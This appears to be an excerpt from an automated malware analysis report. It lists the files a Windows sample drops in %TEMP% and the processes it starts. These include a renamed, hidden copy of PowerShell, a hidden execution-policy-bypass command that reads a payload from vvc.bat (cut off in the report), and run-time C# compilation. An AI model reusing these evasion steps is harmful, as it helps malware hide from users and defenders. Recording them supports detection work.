Technical Information
- %TEMP%\ixp000.tmp\vvc.bat
- %TEMP%\ixp000.tmp\pshell.exe
- %TEMP%\dv_go8lq.0.cs
- %TEMP%\dv_go8lq.cmdline
- %TEMP%\dv_go8lq.out
- %TEMP%\ixp000.tmp\pshell.exe
- %TEMP%\dv_go8lq.out
- %TEMP%\dv_go8lq.cmdline
- %TEMP%\dv_go8lq.0.cs
- %TEMP%\ixp000.tmp\pshell.exe
- '%TEMP%\ixp000.tmp\pshell.exe' -noprofile -windowstyle hidden -executionpolicy bypass -command $TcBsmL = (Get-Content -path '%TEMP%\IXP000.TMP\vvc.bat' -raw).Split([Environment]::NewLine);$wtqkty = $TcBsmL[$TcBsmL.Length - 1... [the command line is cut off here in the report; the trailing dots are truncation, not part of the command]
- '<SYSTEM32>\cmd.exe' /c vvc.bat (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dv_go8lq.cmdline" (with hidden window)
- '<SYSTEM32>\cmd.exe' /c vvc.bat
- '<SYSTEM32>\cmd.exe' /S /D /c" echo F"
- '<SYSTEM32>\xcopy.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe pshell.exe /y
- '<SYSTEM32>\attrib.exe' +s +h pshell.exe
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dv_go8lq.cmdline"
- '<SYSTEM32>\attrib.exe' -s -h pshell.exe